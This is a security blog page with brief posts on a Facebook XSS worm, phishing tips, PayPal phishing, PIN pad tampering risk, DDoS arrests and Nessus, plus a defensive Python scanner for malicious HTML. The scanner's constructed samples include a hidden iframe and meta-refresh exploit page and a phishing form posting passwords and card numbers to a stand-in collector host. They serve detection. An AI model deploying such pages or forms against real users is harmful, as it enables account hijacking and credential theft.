The Security Pub

Random Thoughts About Security

Facebook Vulnerability

There is an unpatched XSS vulnerability in the mobile API version of Facebook that is currently being exploited to post messages to users’ Walls; each posted message serves as a gateway to the specially crafted website that exploits the flaw.

The flaw has been misused for a while now, but has only recently been used widely. Indonesian users are currently targeted by various groups using the vulnerability to their advantage.

“It allows any website to include, for example, a maliciously prepared iframe element that contains JavaScript or use the http-equiv attribute’s “refresh” value to redirect the browser to the prepared URL containing the JavaScript,” explains Symantec. “Any user who is logged into Facebook and visits a site that contains such an element will automatically post an arbitrary message to his or her wall.”

No user interaction is needed, so the messages are spreading through Facebook at a fast pace. Facebook’s security team has been notified about the vulnerability and is working on a fix. Hopefully it will be issued soon, since the attack seems easy to recreate.

Symantec advises users to log out of Facebook when they are not actively using it or to use script-blocking add-ons to prevent the attack.

Phishing Scams are on the Rise

“Phishing” is where fraudsters send spam or pop-up messages to lure unsuspecting recipients into volunteering personal, financial or credential-related information. That information can then be used to commit identity theft, or to enter password-protected sites using your account. As phishing schemes become more sophisticated, it becomes increasingly important to be vigilant.

Learn more about how to spot a bogus phishing message, the important steps you can take to avoid getting “hooked,” and what to do if you’ve mistakenly responded to a phishing email with your personal information.

The “Dos, Don’ts and Nevers” of Phishing

  1. DO Delete suspicious messages immediately.
  2. DON’T click on any links in the message.
  3. Instead, DO copy and paste the URL into a new browser window.
  4. NEVER respond to an unsolicited email, or supply personal information as requested by an email, even if the message looks real.
  5. NEVER supply your passwords or other sensitive information via an email message. No legitimate organization should request your password or other types of sensitive information via an email message.

What to do if you’re compromised

If you believe you might have inadvertently revealed sensitive information such as your password, you should change your password immediately.

If you provided personal financial account information that could be used for identity theft or fraud in response to a fraudulent e-mail claiming to be sent by an outside agency, you should immediately contact the company being spoofed.

PayPal Phishing Has Gone Multilingual

A recent report compiled by OpenDNS showed that 45 percent of all phishing attempts made in 2010 were targeting PayPal customers.

It is no wonder then that we witness PayPal phishing attempts on an almost daily basis. The latest one – spotted by Avira – comes in two flavors: English and French.

The e-mail itself is practically identical in both versions – the only difference is that the English version takes the victim to the phishing page via a link, while the French version employs a button. Even the reference number cited in the e-mail is the same.

The e-mail also contains security tips that, if followed, would thwart the phishers’ plans. I guess they thought the inclusion would make the e-mail look more legitimate and decided to bet on the fact that many people simply ignore such advice and follow the offered link or button.

PIN Pad Physical Security

So I was at the grocery store this evening (I won’t mention which one). When I was paying for my groceries with my credit card I noticed how the PIN pad was secured. Can you see what’s wrong with this picture?

If you are having difficulties identifying what’s wrong I will go ahead and explain…

This grocery store has decided to secure all their PIN pads to the stand with zip ties. I did take a look underneath the device and there weren’t any screws mounting the device to the stand. So if a hacker wanted to, they could easily remove and replace these PIN pads with modified versions.

Here are some examples of good security for physically securing PIN pads.

5 men arrested in relation to Anonymous DDoS attacks

Five men believed to have taken part in the recent Anonymous DDoS attacks were arrested this morning during a series of raids coordinated by the Metropolitan Police Service’s Police Central e-Crime Unit.

The arrested males, aged 15, 16, 19, 20 and 26, have been taken to their local police stations in West Midlands, Northants, Herts, Surrey and London and are currently still in custody, the police said.

They are likely to be charged with offenses under the Computer Misuse Act 1990.

They were probably tracked down by the police because they had been using Anonymous’ LOIC tool to DDoS various sites – a tool that has been shown to be unable to completely anonymize its users’ involvement.

The arrests are the result of a months-old investigation that the Metropolitan Police has mounted with the help of law enforcement agencies from the US and various European countries.

Form Based Phishing Attacks are on the RISE

As always, spammers are keeping abreast of the season’s important events, and know that January is when the public usually submits tax returns and starts getting refunds. Websense is reporting that the form-based approach is being used more frequently than the usual direct links to phishing sites.

What are form-based email attacks?

Form-based attacks are just another type of phishing attack. Instead of using a link to take the user to a phishing site, the hacker includes a form in the e-mail that the user is asked to complete. When the user completes the form and submits it, the details are sent straight to the attacker. Here is a short video that shows an example.
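The three content-level tricks described on this page, the hidden iframe or meta-refresh that drives a logged-in browser to a vulnerable site (the Facebook flaw above), the link whose visible text differs from its real target (the reason the phishing tips say to paste a URL rather than click it), and the credential-harvesting form embedded in an e-mail (form-based phishing), can all be picked up by one HTML scanner. The Python script below is an added example written for this page; it is not code from the original post or from Symantec, Websense or any other vendor named here. All host names and both sample documents are constructed for the demonstration, and the field-name patterns it uses are heuristics, not a vendor's rule set.

```python
"""Heuristic scanner for HTML content: a served web page or an HTML e-mail body.

It reports three patterns:
  1. <iframe> or <meta http-equiv="refresh"> steering the browser to a watched host;
  2. <a> whose visible text looks like a URL but whose href leads elsewhere;
  3. <form> collecting credential/payment fields and posting them to a host
     outside the claimed sender's domain.
All host names and sample documents are constructed for this demo.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Field names that suggest a credential or financial field (heuristic, assumed).
SENSITIVE_FIELD = re.compile(r"pass|pin|ssn|card|cvv|account|routing", re.I)
# Link text that reads like a URL, with or without a scheme.
URL_LIKE_TEXT = re.compile(r"^(https?://)?[\w.-]+\.[a-z]{2,}(/\S*)?$", re.I)


def host_of(url: str) -> str:
    """Lower-case host part of a URL, or '' when there is none."""
    return (urlparse(url.strip()).hostname or "").lower()


def refresh_target(content: str) -> str:
    """Extract the URL from a meta-refresh content value such as '0; url=http://x'."""
    match = re.search(r"url\s*=\s*['\"]?([^'\"\s]+)", content, re.I)
    return match.group(1) if match else ""


class Scanner(HTMLParser):
    def __init__(self, watch_hosts, sender_host):
        super().__init__()
        self.watch = {h.lower() for h in watch_hosts}
        self.sender = sender_host.lower()
        self.findings = []   # list of (kind, detail) tuples
        self._href = None    # href of the <a> currently open, else None
        self._text = []      # visible text collected inside that <a>
        self._form = None    # [action, sensitive field names] for the open <form>

    def _watched(self, url):
        host = host_of(url)
        return any(host == w or host.endswith("." + w) for w in self.watch)

    def _same_org(self, host):
        return bool(self.sender) and (host == self.sender or host.endswith("." + self.sender))

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}   # valueless attributes arrive as None
        if tag == "iframe" and self._watched(a.get("src", "")):
            self.findings.append(("iframe_to_watched_host", a["src"]))
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            target = refresh_target(a.get("content", ""))
            if self._watched(target):
                self.findings.append(("meta_refresh_to_watched_host", target))
        elif tag == "a":
            self._href, self._text = a.get("href", ""), []
        elif tag == "form":
            self._form = [a.get("action", ""), []]
        elif tag == "input" and self._form is not None:
            name, kind = a.get("name", ""), a.get("type", "").lower()
            if kind == "password" or SENSITIVE_FIELD.search(name):
                self._form[1].append(name or kind)

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            text = "".join(self._text).strip()
            if URL_LIKE_TEXT.match(text):
                shown = host_of(text if "://" in text else "http://" + text)
                real = host_of(self._href)
                if shown and real and shown != real:
                    self.findings.append(("link_text_host_mismatch", f"{shown} -> {real}"))
            self._href = None
        elif tag == "form" and self._form is not None:
            action, fields = self._form
            target = host_of(action)
            if fields and target and not self._same_org(target):
                self.findings.append(("credential_form_to_external_host", f"{target}: {fields}"))
            self._form = None


def scan_html(html, watch_hosts=(), sender_host=""):
    """Return the list of (kind, detail) findings for one HTML document."""
    scanner = Scanner(watch_hosts, sender_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample: a third-party page carrying both redirection tricks.
SAMPLE_PAGE = """<html><body>
<iframe src="http://m.social-site.test/post?msg=hello" width="0" height="0"></iframe>
<meta http-equiv="refresh" content="0; url=http://m.social-site.test/post?msg=hello">
</body></html>"""

# Constructed sample: an HTML e-mail claiming to come from paysite.test.
SAMPLE_MAIL = """<p>Dear customer, please confirm your account at
<a href="http://secure-login.collector.test/login">https://www.paysite.test/account</a></p>
<form action="http://collector.test/submit" method="post">
  Email <input name="email"> Password <input type="password" name="passwd">
  Card <input name="cardnumber"> <input type="submit" value="Confirm">
</form>"""

if __name__ == "__main__":
    for kind, detail in scan_html(SAMPLE_PAGE, watch_hosts=["social-site.test"]):
        print("page:", kind, detail)
    for kind, detail in scan_html(SAMPLE_MAIL, sender_host="paysite.test"):
        print("mail:", kind, detail)
```

The watch-list and sender host are supplied by the caller, so the same scanner can run in a proxy filter (watching the host whose API is known to be vulnerable) or in a mail gateway (comparing form and link targets against the domain the message claims to come from). The field-name regex is deliberately broad; tune it to the forms your own users legitimately receive.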

Nessus iPhone Application

Tenable has released a free iPhone application for its Nessus Vulnerability Scanner. This iPhone application provides Nessus users the ability to:

  • Connect to a Nessus server
  • Launch scans
  • Create new scans
  • Review reports

All you will need is an iPhone or iPod Touch running iOS 4.0 or later. You can download the Nessus iPhone application in the App Store, under the Productivity category.